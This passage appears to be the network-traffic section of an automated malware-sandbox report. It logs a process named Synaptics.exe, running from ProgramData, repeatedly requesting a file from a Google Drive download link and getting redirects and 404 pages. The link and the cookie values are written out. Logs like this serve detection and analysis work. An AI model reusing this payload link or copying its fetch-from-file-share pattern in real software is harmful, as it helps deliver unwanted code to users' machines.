    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
30          192.168.2.8  49769        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:30 UTC  143                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
2024-12-30 10:25:31 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:31 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Cross-Origin-Opener-Policy: same-origin
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-g903Fcli61Ga-KbhYKH7EQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
31          192.168.2.8  49772        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:31 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
2024-12-30 10:25:32 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:31 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: script-src 'report-sample' 'nonce-UR54LSC-Yd4SxpIc32s5Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Cross-Origin-Opener-Policy: same-origin
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
32          192.168.2.8  49771        172.217.16.193  443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:31 UTC  388                OUT        GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
    Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
2024-12-30 10:25:32 UTC  1243               IN         HTTP/1.1 404 Not Found
    X-GUploader-UploadID: AFiumC7e9H7ozF1IkuFVQd2cuI6EycA4afrGB52MLfoXKOe8nHrYyS6SnnbFSTWVlObWWvms
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:32 GMT
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-Qjy_facuBzRPZ7xk7SbkvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Content-Length: 1652
    Server: UploadServer
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Content-Security-Policy: sandbox allow-scripts
    Connection: close
2024-12-30 10:25:32 UTC  147                IN         Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:25:32 UTC  1390               IN         Data Ascii: t Found)!!1</title><style nonce="OpYsUxHV9Re1Fkj1dAgDGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:25:32 UTC  115                IN         Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
33          192.168.2.8  49774        216.58.206.46   443               6892  C:\ProgramData\Synaptics\Synaptics.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-30 10:25:31 UTC  345                OUT        GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
    User-Agent: Synaptics.exe
    Host: docs.google.com
    Cache-Control: no-cache
    Cookie: NID=520=VL_GHZV1e_y-7-YB2QhgR7m41cVMxQehDrS9YBmiQePvr4mGlbgJWI4frSdZlJpHQfJBXPaJRMtMOz-UlrnyXePV6GErcwoBgK_mJp59isaoCyA6TPNmmXhLo_HbqvVx5bRNbysM9xEJdnROQz30aVMRuLtW1PCVTQponmnCmpzk3I1sm9gCaXPs
2024-12-30 10:25:32 UTC  1314               IN         HTTP/1.1 303 See Other
    Content-Type: application/binary
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Mon, 30 Dec 2024 10:25:31 GMT
    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
    Strict-Transport-Security: max-age=31536000
    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
    Content-Security-Policy: script-src 'report-sample' 'nonce-Bq8uJJAvtezTYgiolman9g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    Cross-Origin-Opener-Policy: same-origin
    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
    Server: ESF
    Content-Length: 0
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    X-Content-Type-Options: nosniff
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Connection: close


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              34192.168.2.849773172.217.16.1934436892C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-30 10:25:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                              2024-12-30 10:25:32 UTC1250INHTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC496NTgK6h3xMyBqWSTOASkXSKl3GnDYd9nasW8WRII1hElLU3ClkdR9bSe5uRUGiUAG82Nhp4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-mYgoKkz3iu8UGoANOzWn6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                               2024-12-30 10:25:32 UTC | 140 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                               2024-12-30 10:25:32 UTC | 1390 | IN | Data Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 63 42 6a 4a 49 5f 46 68 33 7a 66 71 59 57 46 33 59 56 74 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="5cBjJI_Fh3zfqYWF3YVtRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                               2024-12-30 10:25:32 UTC | 122 | IN | Data Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                               Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                               35         | 192.168.2.8 | 49776       | 216.58.206.46  | 443              | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                               Timestamp               | Bytes transferred | Direction | Data
                                                                                                               2024-12-30 10:25:32 UTC | 345               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                               2024-12-30 10:25:33 UTC | 1314              | IN        | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-AN4gKJo9x9RiRluab330iQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                               36         | 192.168.2.8 | 49777       | 216.58.206.46  | 443              | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                               Timestamp               | Bytes transferred | Direction | Data
                                                                                                               2024-12-30 10:25:32 UTC | 345               | OUT       | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Host: docs.google.com
                                                                                                              Cache-Control: no-cache
                                                                                                              Cookie: NID=520=Qd4VV-n1Yf_ROsUrgdKPuhVdJtms881kuw5-NEclGzUMI-pzv_r7t2oeNy-J9FSKFzrC8RsZb1jmpZAtwdutAPAfwkkSqRjkQFouA9iiTjkzbMvRRD3RPGPIjJYkuZSKDMDHOQm86-lM5ResjXUPxi-6QIAowC9RRf915vNdpP-y3I2vWdY5l_w8
                                                                                                               2024-12-30 10:25:33 UTC | 1314              | IN        | HTTP/1.1 303 See Other
                                                                                                              Content-Type: application/binary
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:32 GMT
                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wPdbpHILCcE6JjrWEaR5ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Server: ESF
                                                                                                              Content-Length: 0
                                                                                                              X-XSS-Protection: 0
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Connection: close


                                                                                                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                               37         | 192.168.2.8 | 49778       | 172.217.16.193 | 443              | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                               Timestamp               | Bytes transferred | Direction | Data
                                                                                                               2024-12-30 10:25:32 UTC | 388               | OUT       | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                               2024-12-30 10:25:33 UTC | 1243              | IN        | HTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC5jmVxbhKzSUIIMFEX3ZytixDiL3pADFVe1hXbxbncX_zXYotPCkL30PeGkRSTsKXg4
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-14sotBtS7tYQzdxzS66IRg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Content-Length: 1652
                                                                                                              Server: UploadServer
                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                              Connection: close
                                                                                                               2024-12-30 10:25:33 UTC | 147 | IN | Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                               2024-12-30 10:25:33 UTC | 1390 | IN | Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 4c 69 2d 53 39 55 4a 49 71 6f 74 4e 72 4a 4f 5f 48 79 4c 78 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                              Data Ascii: t Found)!!1</title><style nonce="oLi-S9UJIqotNrJO_HyLxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                               2024-12-30 10:25:33 UTC | 115 | IN | Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                               Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                               Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
                                                                                                               38         | 192.168.2.8 | 49779       | 172.217.16.193 | 443              | 6892 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                               Timestamp               | Bytes transferred | Direction | Data
                                                                                                               2024-12-30 10:25:32 UTC | 388               | OUT       | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                              User-Agent: Synaptics.exe
                                                                                                              Cache-Control: no-cache
                                                                                                              Host: drive.usercontent.google.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Cookie: NID=520=O2-uLuK1H_3IRph968XsKPrjYK1wNBsE5Un0FDfeThb2nS50H47K9LoEn7OJPLbCxP8nwafmvXVbYxLMrxlqhOx4vXECHSKT9Xrfd0BKX85TkbVjlg49e3TUmYikTS_MTtoGE_7h36UVxrLmaYobwiBVXoIdLlO2DCWGeJBISTSaxEHq7mNjDsZP
                                                                                                               2024-12-30 10:25:33 UTC | 1243              | IN        | HTTP/1.1 404 Not Found
                                                                                                              X-GUploader-UploadID: AFiumC7izHuar7uQ206L-xu-k3mj8LBhLHAY1kar-yZIWx6R1SlJEKFkJn_hhdGnfvonz0ZK
                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                              Date: Mon, 30 Dec 2024 10:25:33 GMT
                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-JzbTiofveld_1weHm55m-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
